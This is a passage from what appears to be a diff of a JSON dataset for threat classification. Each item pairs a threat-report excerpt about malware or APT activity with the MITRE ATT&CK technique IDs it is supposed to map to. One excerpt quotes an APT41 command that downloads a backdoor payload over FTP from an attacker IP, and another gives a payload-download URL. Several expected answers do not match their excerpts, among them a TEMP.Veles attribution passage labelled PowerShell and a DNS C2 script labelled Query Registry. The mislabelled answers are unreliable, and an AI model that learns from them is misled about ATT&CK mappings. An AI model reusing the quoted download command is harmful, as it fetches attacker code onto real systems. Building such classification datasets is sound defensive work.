ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One of the tactics it uses to avoid drawing attention to itself is impersonating commonly used software packages such as Windows or Adobe Reader. It has never attempted to compromise the software itself. Rather, it gives its tools file names similar to those used by the software and places them in directory trees that could be mistaken for those used by the legitimate software", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Since 2020, Proofpoint researchers have observed TA416, an actor assessed to be aligned with the Chinese state, utilizing web bugs to profile their targets. Commonly referred to as tracking pixels, web bugs embed a hyperlinked non-visible object within the body of an email that, when enabled, will attempt to retrieve a benign image file from an actor-controlled server. This provides a \u201csign of life\u201d to threat actors and indicates that the targeted account is valid with the user being inclined to open emails that utilize social engineering content. TA416 has been using web bugs to target victims prior to delivering malicious URLs that have installed a variety of PlugX malware payloads", + "output": "- T1608: Stage Capabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cybercriminals will often use LNK files attached in an email\u00a0to launch an attack on unsuspecting victims. And we recently noticed another campaign using this technique", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After this information is obtained, the attacker can generate and send a specially crafted HTTP POST request to the Exchange server with an XML SOAP payload to the Exchange Web Services (EWS) API endpoint", + "output": "- T1590: Gather Victim Network Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A threat actor known as Silent Librarian/TA407/COBALT DICKENS has been actively targeting universities via spear phishing campaigns since schools and universities went back", + "output": "- T1608.005: Stage Capabilities - Link Target" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker\u2019s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim\u2019s system", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CookieMiner issues a series of commands to configure the victim\u2019s machine to mine cryptocurrency and maintain persistence (Figure 6). The program xmrig2 is a Mach-O executable for mining cryptocurrency. As seen in Figure 7, the address \u201ck1GqvkK7QYEfMj3JPHieBo1m7FUkTowdq6H\u201d has considerable mining performance. It has been ranked as a top miner in the Maruru mining pool (koto-pool.work).\u00ad\u00ad\u00ad The cryptocurrency mined is called Koto, which is a Zcash-based anonymous cryptocurrency. The has addresses in Figure 8 use the \u201cYescrypt\u201d algorithm which is good for CPU miners but not ideal for GPU miners. This is ideal for malware as the victim hosts are not guaranteed to have discrete GPUs installed in them but are guaranteed to have a CPU available. We believe the malware authors may have intentionally used this filename to create confusion since the miner is actually mining the Koto cryptocurrency", + "output": "- T1543.001: Create or Modify System Process - Launch Agent" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "38, the credentials are retrieved from the logins.json file and the browser history is retrieved from the places.sqlite database", + "output": "- T1217: Browser Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Copy itself to the %APPDATA%\\Microsoft folder, add this file path in the registry \u2018Run\u2019 key under the value \u2018BackUp Mgr\u2019 and then execute the loader from the copied location. 2) If the loader cannot access the %APPDATA% location or if the loader is running from this location already, then it adds the current file path in the \u2018Run\u2019 registry key under the value \u2018BackUp Mgr\u2019 and executes the loader again from this location", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As we mentioned, the adversary used a technique called template injection. A .docx file is a zip file containing multiple parts. Using the template injection technique, the adversary puts a link towards the template file in one of the .XML files, for example the link is in settings.xml.rels while the external oleobject load is in document.xml.rels. The link will load a template file (DOTM) from a remote server. Some of these template files are renamed as JPEG files when hosted on a remote server to avoid any suspicion and bypass detection. These template files contain Visual Basic macro code, that will load a DLL implant onto the victim\u2019s system", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Last but not least, the malware creates an id, in the same way as seen in previous Zebrocy binaries. It retrieves the UserName via the GetUserNameW Windows API and prepends the volume serial number of the C:\\ drive", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Should the victim use one of these portable browsers with a proxy server configured, the malware can find that in the user\u2019s preferences and use that proxy to communicate with its C&C servers", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While Emotet has been around for many years and is one of the most well-known pieces of malware in the wild, that doesn't mean attackers don't try to freshen it up. These new campaigns have been observed following a period of relatively low Emotet distribution activity, corresponding with the observance of Orthodox Christmas in certain geographic regions. These new malicious efforts involve sending victims malicious Microsoft Word attachments with embedded macros that download Emotet. This latest strain has also gained the ability to check if the infected IP where the malicious email is being sent from is already blocklisted on a spam list", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PlugX executes DLL hijacking with benign applications such as ESET antivirus, Adobe Update etc. Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Helminth executable is able to communicate with its C2 server via HTTP and via DNS queries in very similar ways to the Helminth script variant. In fact, the DNS beacons follow the same structure and sequence as the script variant of Helminth discussed in the previous section", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All this information was then sent to one of the following domains: G1 also had the ability to execute commands remotely on the infected host machine at the author's will", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NoComm \u2013 No command, which causes the script to keep sending POST requests. Base64 string \u2013 A module to execute. The module is encrypted with a simple substitution cipher and encoded in base64", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command \u2018/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd\u2019, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of \u2018test\u2019 and a password that we have redacted, and then downloaded an unknown payload named \u2018bsd\u2019 (which was likely a backdoor", + "output": "- T1071.002: Application Layer Protocol - File Transfer Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Given their capability and sophistication, it is unlikely that IRON RITUAL's intrusions will leave sufficient artifacts to allow researchers to associate their activities with previous or future Russian cyber espionage operations. The group has used malware including the SUNBURST (also known as Solorigate) backdoor and in-memory Cobalt Strike delivered using the TEARDROP and RAINDROP loaders. CTU researchers assess with high confidence that IRON RITUAL's intent is long term, covert access to networks of interest for the purposes of espionage and data theft.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool", + "output": "- T1550: Use Alternate Authentication Material" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Let\u2019s look at an example. During our investigation of an infection at a computer game company, we found that malware had been created for a particular service on the company\u2019s server. The malicious program was looking for a specific process running on the server, injected code into it, and then sought out two places in the process code where it could conceal call commands for its function interceptors. Using these function interceptors, the malicious programs modified process data which was processed in those two places, and returned control back. Thus, the attackers change the normal execution of the server processes. Unfortunately, the company was not able to share its targeted application with us, and we cannot say exactly how this malicious interference affected gaming processes", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. and only continues if the file exists", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The adversary uses Cobalt Strike as framework to manage their compromised systems. We observed the use of Cobalt Strike\u2019s C2 protocol encapsulated in DNS by the adversary in 2017 and 2018. They switched to C2 encapsulated in HTTPS in Q3 2019. An interesting observation is they made use of a cracked/patched trial version of Cobalt Strike. This is important to note because the functionalities of Cobalt Strike\u2019s trial version are limited. More importantly: the trial version doesn\u2019t support encryption of command and control traffic in cases where the protocol itself isn\u2019t encrypted, such as DNS. The DNS-responses weren\u2019t logged. This means that only the DNS C2 leaving the victim\u2019s network was logged. We developed a Python script that decoded and combined most of the logged C2 communication into a human readable format. As the adversary used Cobalt Strike with DNS as command & control protocol, we were able to reconstruct more than two years of adversary activity", + "output": "- T1071.004: Application Layer Protocol - DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Anchor_DNS was able to stay under-the-radar by using specific execution flags. If these command-line arguments are not supplied, the Anchor_DNS terminates", + "output": "- T1480: Execution Guardrails" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal", + "output": "- T1102.002: Web Service - Bidirectional Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The dns.ps1 script is also responsible for communicating with the C2 server, but it uses DNS queries to send data to the server. The DNS queries sent by this script are queries to subdomains on the same domain as the C2 server, which contains system information or the contents of files from the system. The subdomain of the DNS request that acts as the initial C2 beacon has the following structure", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile. Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile. Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140, which is registered to CNIIHM. This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities. It also has engaged in network reconnaissance against targets of interest to TEMP.Veles. The IP address has been tied to additional malicious activity in support of the TRITON intrusion. This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities. It also has engaged in network reconnaissance against targets of interest to TEMP.Veles. The IP address has been tied to additional malicious activity in support of the TRITON intrusion", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1071: Application Layer Protocol\n- T1132: Data Encoding\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN5, which earlier this year was profiled by researchers at Trend Micro and has been in action since at least 2008, uses real credentials from the victim organization's virtual private network, Remote Desktop Protocol, Citrix, or VNC. Vengerik says the attackers got those credentials via third parties associated with the victims' POS systems", + "output": "- T1133: External Remote Services\n- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first action performed by the crypter code is to check some specific registry key. If the key is not detected, the crypter will enter an infinite loop or exit, thus it is used as an anti-analysis technique", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April. The worm specifically scans for the existence of the DoublePulsar backdoor on compromised systems. If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock. The second thread scans randomly chosen external IP addresses", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The main infection vector for Poseidon is the use of spear-phishing emails including RTF/DOC files, usually with a human resources lure. Poseidon\u2019s toolkit displays an awareness of many antivirus providers over the years, attempting to attack or spoof these processes as a means of self-defense for their infections", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. This repeat attack may suggest that the adversaries have lost their foothold in the targeted organization, or that it may be considered a high value target. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the \u2018at' or \u2018schtask' commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity", + "output": "- T1053.002: Scheduled Task/Job - At\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The kernel driver is a commercial product that the attackers are abusing called RawDisk by EldoS Corporation, which provides direct access to files, disks and partitions. It appears that the \u201cdrdisk.sys\u201d driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. With the kernel driver installed, the wiper can begin writing to protected system locations, such as the master boot record (MBR) and partition tables of storage volumes. If the wiper is configured with the \"\"E\"\" setting, the wiper will encrypt the contents of the file using a random value as a key and the RC4 algorithm. If configured with the \"\"R\"\" setting, the wiper will 